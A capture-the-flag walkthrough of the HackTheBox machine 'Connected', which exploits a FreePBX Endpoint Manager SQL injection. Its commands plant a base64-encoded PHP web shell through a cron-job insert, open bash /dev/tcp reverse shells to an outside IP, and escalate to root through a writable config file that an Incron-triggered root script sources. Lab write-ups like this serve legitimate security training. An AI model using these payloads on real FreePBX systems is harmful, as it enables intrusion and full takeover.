HackTheBox Writeup - Connected
Introduction
Connected is a Season 11 Linux machine on HackTheBox that features a FreePBX installation. The exploitation path involves an unauthenticated SQL injection in the Endpoint Manager module, leading to Remote Code Execution (RCE) via system cron jobs. Privilege escalation is achieved by exploiting a misconfigured Incron service that sources a writable configuration file.
Enumeration
Nmap Scan
Starting with a standard Nmap scan to identify open ports:
1
nmap -sC -sV -oN nmap_initial.txt 10.129.2.106
Output:
1
2
3
4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16)
443/tcp open ssl/https Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
The web server hosts FreePBX 16.0.40.7.
Foothold
Unauthenticated SQL Injection (CVE-2025-57819)
Researching the FreePBX version reveals a critical unauthenticated SQL injection in the Endpoint Manager component. The vulnerable endpoint is /admin/ajax.php where the brand parameter is susceptible to stacked-query injection.
We can use this to insert a malicious job into the cron_jobs table. FreePBX periodically executes commands from this table as the asterisk user.
Payload Delivery
The following payload inserts a job that decodes a base64 string into a PHP web shell at /var/www/html/wt-shell3.php:
1
curl -ik -G --data-urlencode "brand=x'; INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','wt-shell3','echo \"PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==\"|base64 -d >/var/www/html/wt-shell3.php',NULL,'* * * * *',30,1,1)-- -" "http://connected.htb/admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model"
After waiting about a minute for the cron job to trigger, we can verify the web shell:
1
2
curl -ik "http://connected.htb/wt-shell3.php?cmd=id"
# uid=999(asterisk) gid=1000(asterisk) groups=1000(asterisk)
Reverse Shell
Establish a reverse shell by sending a bash redirection payload:
1
curl -ik -G --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.203/80 0>&1'" "http://connected.htb/wt-shell3.php"
User Flag: 6824db9c13d3e88cef5dd67a7f709021
Privilege Escalation
Incron and Sourcing Vulnerability
Enumerating the system reveals that /etc/dahdi/init.conf is writable by the asterisk user:
1
2
ls -la /etc/dahdi/init.conf
# -rw-r--r--. 1 asterisk asterisk 771 Jun 5 2023 /etc/dahdi/init.conf
Further investigation into Incron configs shows that a root-owned script /usr/sbin/sysadmin_dahdi_restart is executed whenever the file /var/spool/asterisk/sysadmin/dahdi_restart is modified.
The root script sources the writable /etc/dahdi/init.conf file, which allows us to execute arbitrary commands as root.
Exploitation
- Inject Payload: Append a reverse shell command to the configuration file.
1
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.203/4445 0>&1" &' >> /etc/dahdi/init.conf
- Trigger Execution: Write to the monitored file to trigger the Incron event.
1
echo 'restart' > /var/spool/asterisk/sysadmin/dahdi_restart
Catch the incoming connection on our listener:
1
2
3
nc -lvnp 4445
# [root@connected /]# id
# uid=0(root) gid=0(root) groups=0(root)
Root Flag: 958931a893953bc371afc148ec633a60
Conclusion
This machine demonstrates the risk of unauthenticated administrative endpoints and the importance of secure file permissions. Always ensure that configuration files sourced by high-privilege scripts are not writable by lower-privileged users.